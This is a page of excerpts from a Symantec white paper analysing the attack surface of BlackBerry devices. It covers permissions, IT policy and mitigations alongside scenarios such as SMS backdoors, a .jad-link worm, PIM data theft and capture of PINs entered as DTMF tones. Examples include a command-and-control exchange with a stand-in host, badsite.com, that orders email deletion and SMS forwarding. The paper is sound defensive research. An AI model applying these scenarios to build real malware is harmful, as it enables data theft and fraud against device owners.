Specifications

ManualsBrandsBlackberry ManualsOtherJAVA DEVELOPMENT ENVIRONMENT - - FUNDAMENTALS GUIDE

Table Of Contents

WHITE PAPER: SYMANTEC SECURITY RESPONSE

Attack Surface

Analysis of

BlackBerry Devices

James O’Connor

Symantec Security Response, Ireland

Summary of content (39 pages)

PAGE 1
WHITE PAPER: SYMANTEC SECURITY RESPONSE Attack Surface Analysis of BlackBerry Devices James O’Connor Symantec Security Response, Ireland
PAGE 2
PAGE 3
White Paper: Symantec Security Response Attack Surface Analysis of BlackBerry Devices Contents Introduction.........................................................................................................................................................5 Architecture Overview.........................................................................................................................................6 Operating System.........................................................................
PAGE 4
White Paper: Symantec Security Response Attack Surface Analysis of BlackBerry Devices Worm.........................................................................................................................................................22 Mitigation.................................................................................................................................................23 PIM Data (Personal Information Manager Data)...............................................................
PAGE 5
Attack Surface Analysis of BlackBerry Devices Introduction The BlackBerry device and supporting platform are developed by Research In Motion (RIM), a Canadian software and hardware company based in Waterloo, Ontario. One of the BlackBerry's main selling points is that it provides an integrated wireless messaging system, providing push email access over cellular wireless networks throughout the world.
PAGE 6
Attack Surface Analysis of BlackBerry Devices tion may result in behavior different to that outlined in this document. This document touches on the role of backend BlackBerry Enterprise Server (BES) and BlackBerry Internet Service (BIS) solutions, but does not go into detail about their deployment. This document also doesn’t discuss vulnerabilities in the BlackBerry device due to hardware, operating system or firmware bugs.
PAGE 7
Attack Surface Analysis of BlackBerry Devices BlackBerry using the javaloader utility, but when the user attempts to execute it, they get an error such as "Error starting X, Module 'X' attempts to access a secure API." (Figure 1). Modifying Signed Applications It is interesting to note the behavior of a signed application that has been modified post-compilation. In one test case, a signed application was written which attempted to read incoming SMS messages.
PAGE 8
Attack Surface Analysis of BlackBerry Devices It's worth mentioning that the signing keys are encrypted on the host by default, and the user must enter a password in order to decrypt the keys and initiate the code signing process. Offline brute force cracking of this key is not possible, because the only way to know if the key has been decrypted correctly is to initiate code signing with RIM across the network and to wait and see if it has been successful.
PAGE 9
Attack Surface Analysis of BlackBerry Devices Permission Default Value (BIS) Allowable values Connections USB Bluetooth Phone Location (GPS) Carrier Internet Interactions Interprocess Communication Module Management Keystroke Injection Browser Filters Theme Data User Data Email PIM Files Key Store Key Store Medium Security Custom Allow Allow Prompt Allow Prompt Custom Allow Allow Deny Deny Allow Allow Allow Allow Allow Allow Allow Allow, Custom, Deny Allow, Deny Allow, Deny Allow, Prompt, Deny Allow,
PAGE 10
Attack Surface Analysis of BlackBerry Devices Figure 4: Permission Options Top Figure 5: Permission Options Bottom Device Firewall Firewall options can be set on the BlackBerry by going to the following menu: Options > Security Options > Firewall The user is then presented with the options outlined in Figure 6. On a BIS deployment, the Firewall is disabled by default.
PAGE 11
Attack Surface Analysis of BlackBerry Devices IT Policy Policy Rule Disallow Third Party Application Download Description Determines if the BlackBerry can download 3rd party applications. This does not affect already installed applications. Cannot be used to block specific applications from being downloaded; it's all or nothing. Default Value False Allow External Connections Determines if applications can initiate external connections such as SMS or sockets.
PAGE 12
Attack Surface Analysis of BlackBerry Devices Application Control Policy (continued) Policy Rule Local Connections Phone Access Description Stipulate whether or not the application can make local network connections (for example, using USB or serial port). Stipulate whether or not the application can initiate phone calls and access phone logs on the BlackBerry device. Using this rule you can allow, prompt user, or deny application initiated phone calls.
PAGE 13
Attack Surface Analysis of BlackBerry Devices Application Permissions See the section titled "BIS Deployment" for information on how to setup Application Permissions on the BlackBerry device. Note that it is not possible to reduce any constraints imposed by an IT/Application Control Policy using the Application Permissions settings on the device. Device Firewall See the section titled "BIS Deployment" for information on how to setup the Device Firewall on the BlackBerry device.
PAGE 14
Attack Surface Analysis of BlackBerry Devices Sub-System Spoofing Data Data Backdoor Service Availability Network Wormable Interception Theft Abuse Access /Access JAD Files AI File System AO SMS FAI FAI FAI FAI Bluetooth FAIO FAIO Email FAI FAI FAI PIM A A TCP/IP FAI FAI HTTP FAI FAI FAI Telephony A A A Legend: F: Firewall A: Application Control/Permissions I: IT Policy O: Other Device Settings All but one of the attacks (JAD Spoofing) outlined in this section require malicious code to be present on the d
PAGE 15
Attack Surface Analysis of BlackBerry Devices exhibit similar behavior.18 Typically however the screen which presents the contents of the .jad file is only one of a number of checks which are performed. When the user then executes the code the signature of the JAR (Java ARchive) in the case of non-BlackBerry devices is still checked and the user warned if not signed.
PAGE 16
Attack Surface Analysis of BlackBerry Devices BlackBerry Persistence Model • Proprietary • Application needs to be signed • Can store any object that implements the Persistable interface (plus some native types). • Data can be shared between applications subject to signing and other access controls. For information on how to protect data from inappropriate use, see the ControlledAccess class in the RIM Device Java Library5 and the BlackBerry JDE Development Guide.
PAGE 17
Attack Surface Analysis of BlackBerry Devices they may not pose a risk to the BlackBerry itself, they may infect other computers that the BlackBerry is subsequently connected to. Mitigation You can set the following options to mitigate the scenario outlined above. See Mitigation Strategies for more information.
PAGE 18
Attack Surface Analysis of BlackBerry Devices Auto start-up and Background processes Signed applications can start themselves automatically whenever the system is started via compile time settings. The developer simply designates the application as a “System Module” that should “Auto-run on startup” in the project properties (see Figure 9). This also has the effect of not displaying the application in the standard ribbon.
PAGE 19
Attack Surface Analysis of BlackBerry Devices • • • • User downloads and runs an application (e.g. game with "post my high-score online" option). If the code is unsigned, the user receives a prompt "Allow Network Access?" User agrees (thinking they are posting their high-scores on a Web site) The application proceeds to send a premium rate SMS message in the background unbeknownst to the user until they receive their phone bill Note that if the application is signed, the user will not be prompted.
PAGE 20
Attack Surface Analysis of BlackBerry Devices SMS Backdoor A signed malicious application could use SMS as a command and control channel for a backdoor. It could send and receive messages; steal or modify sensitive data and open TCP/IP connections. Incoming SMS messages could be monitored for keywords or a particular originating phone number. These messages could then be interpreted as commands to perform a variety of actions on behalf of the attacker.
PAGE 21
Attack Surface Analysis of BlackBerry Devices Bluetooth The BlackBerry Pearl 8100 has increased Bluetooth support compared to some of its predecessors. It now provides the following profiles: • • • • • Handsfree Handset Serial Port OBEX (OBject EXchange, for file transfer) DUN (Dial Up Networking) Applications can transmit data to and from the BlackBerry via the Bluetooth serial port profile, but pairing is always required (Figure 11).
PAGE 22
Attack Surface Analysis of BlackBerry Devices Mitigation You can set the following options to mitigate the attacks outlined above. See Mitigation Strategies for more information.
PAGE 23
Attack Surface Analysis of BlackBerry Devices • Along with matching .jad file: http://www.badsite.com/game.jad • Attacker starts worm by sending an email to a BlackBerry user of the form: From: To: "Bob Brickhaus" Subject: Cool Game Hey, check out this cool new game! http://www.badsite.com/game.jad • • • • • • The user opens the .jad file, and is prompted to download and install the .cod file. The .cod file installs itself as a start-up process with no icon.
PAGE 24
Attack Surface Analysis of BlackBerry Devices Backdoor IT Policy Application Controls Device Firewall Application Permissions Other Device Settings Worm IT Policy "Message Access" = Not Permitted Block Incoming Messages > BlackBerry Internet Service = Ticked User Data > Email = Deny "Disallow Third Party Application Download " = True Application Controls "Message Access" = Not Permitted Device Firewall Block Incoming Messages > BlackBerry Internet Service = Ticked Application Permissions User Data
PAGE 25
Attack Surface Analysis of BlackBerry Devices Data Theft A malicious signed application could read all the PIM data (including that mentioned in the table above) and send it to an attacker using the variety of transport mechanisms outlined in this document. Loss of data availability and integrity A malicious signed application could compromise the availability and integrity of the data stored in the PIM database. For example it could: • • • • • • Change the number associated with a contact name.
PAGE 26
Attack Surface Analysis of BlackBerry Devices attacker may be able to obtain another BlackBerry SIM from the same network provider, which uses the same BlackBerry APN. If the network provider does not sufficiently segment or filter user IP traffic, then this second SIM could be used by the attacker in another device to connect to the TCP server socket on the affected BlackBerry device.
PAGE 27
Attack Surface Analysis of BlackBerry Devices Backdoor A malicious application could establish a connection to the attacker, and then accept commands that would allow the attacker to access and modify sensitive data, and initiate further connections and messages. Port Scan Since an application can open sockets, it can perform a TCP scan on a network host or a range of network hosts. Depending on the network configuration, this could include scanning the internal network (via MDS).
PAGE 28
Attack Surface Analysis of BlackBerry Devices Proxy/Firewall Bypass IT Policy Application Controls Device Firewall Application Permissions Other Device Settings "Allow External Connections" = False "Allow Internal Connections" = False "External Domains" = [list of allowed domains] or "External Network Connections" = Not Permitted "Internal Network Connections" = Not Permitted Status = Enabled Connections > Carrier Internet = Deny Backdoor IT Policy Application Controls Device Firewall Application Permis
PAGE 29
Attack Surface Analysis of BlackBerry Devices Application sends: http://www.badsite.com/whatnow? Web site returns: COMMAND=DELETE_ALL EMAIL COMMAND=FORWARD_ALL SMS TO 0865550456 Application sends: http://www.badsite.com/whatnow?Status=Email+Deleted&Status=SMS+Forwarding+ON HTTP Proxy A malicious application could use the BlackBerry device to proxy HTTP traffic or contact Web servers with predefined content.
PAGE 30
Attack Surface Analysis of BlackBerry Devices Backdoor IT Policy "Allow External Connections" = False Application Controls "External Domains" = [list of allowed domains] or "External Network Connections" = Not Permitted Device Firewall Application Permissions Status = Enabled Connections > Carrier Internet = Deny Other Device Settings HTTP Proxy IT Policy "Allow External Connections" = False Application Controls "External Domains" = [list of allowed domains] or "External Network Connections" = Not
PAGE 31
Attack Surface Analysis of BlackBerry Devices Signed applications can also invoke the phone application that comes with the BlackBerry to initiate phone calls, however the user is prompted to accept the outgoing call before it is actually placed. (Figure 14) Call Record Monitoring Call record monitoring is the most plausible attack scenario. An application can collect all call records such as calls made, received, and their durations and send them to a third party.
PAGE 32
Attack Surface Analysis of BlackBerry Devices PhoneCall.getDTMFTones() method to retrieve the string of tones entered by the user and hence their PIN code. This can then be sent to the attacker along with the dialled number for further use via one of a number means outlined previously in this document. This approach has been successfully tested using a proof of concept implementation. Telephony Data Theft Data can also be exported from the BlackBerry as DTMF tones during a phone call.
PAGE 33
Attack Surface Analysis of BlackBerry Devices Call Record Monitoring / Bypassing Caller Verification Systems / Telephony Data Theft / Premium Rate Calls IT Policy Application Controls Device Firewall Application Permissions Other Device Settings "Phone Access" = Not Permitted Connections > Phone = Deny Camera The Pearl 8100 includes a 1.3 megapixel digital still camera. Signed applications can invoke the supplied camera application, but cannot instruct it to take pictures.
PAGE 34
Attack Surface Analysis of BlackBerry Devices interaction to succeed. However protection via user judgement cannot be overestimated, as it has been proven ineffective over and over again on other platforms such as the PC.13 As the BlackBerry continues to become more popular, especially with non-government, mainstream consumers and enterprises, the trend for RIM has been to add more user friendly features such as a camera and Bluetooth file transfer.
PAGE 35
Attack Surface Analysis of BlackBerry Devices Appendix A The table below illustrates which features of the BlackBerry API require code signing, which can be used unsigned with user prompting, and which can be used freely unsigned.
PAGE 36
Attack Surface Analysis of BlackBerry Devices References 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 36 BlackBerry Java Development Environment Version 4.2.0 Fundamentals Guide, RIM. http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/8655/8656/1271077/ BlackBerry_Java_Development_Environment_Fundamentals_Guide.pdf?nodeid=1271322&vernum=0 BlackBerry Java Development Environment Version 4.2.0 Development Guide, RIM. http://www.blackberry.
PAGE 37
Attack Surface Analysis of BlackBerry Devices 21 Connected Limited Device Configuration 1.1 (CLDC) Specification, Java Community Process. http://jcp.org/aboutJava/communityprocess/final/jsr139/ 22 BlackBerry Enterprise Server Policy Reference Guide, RIM. http://www.blackberry.com/knowledgecenterpublic/livelink.exe/fetch/2000/8067/645045/7963/1139827/BlackB erry_Enterprise_Server_Policy_Reference_Guide.pdf?nodeid=1139948 23 MIDP Signing, Sun Microsystems. http://java.sun.com/j2me/docs/wtk2.
PAGE 38
PAGE 39
About Symantec Symantec is the global leader in information security, providing a broad range of software, appliances, and services designed to help individuals, small and mid-sized businesses, and large enterprises secure and manage their IT infrastructure. Symantec’s Norton™ brand of products is the worldwide leader in consumer security and problem-solving solutions. Headquartered in Cupertino, California, Symantec has operations in 35 countries. More information is available at www.symantec.com.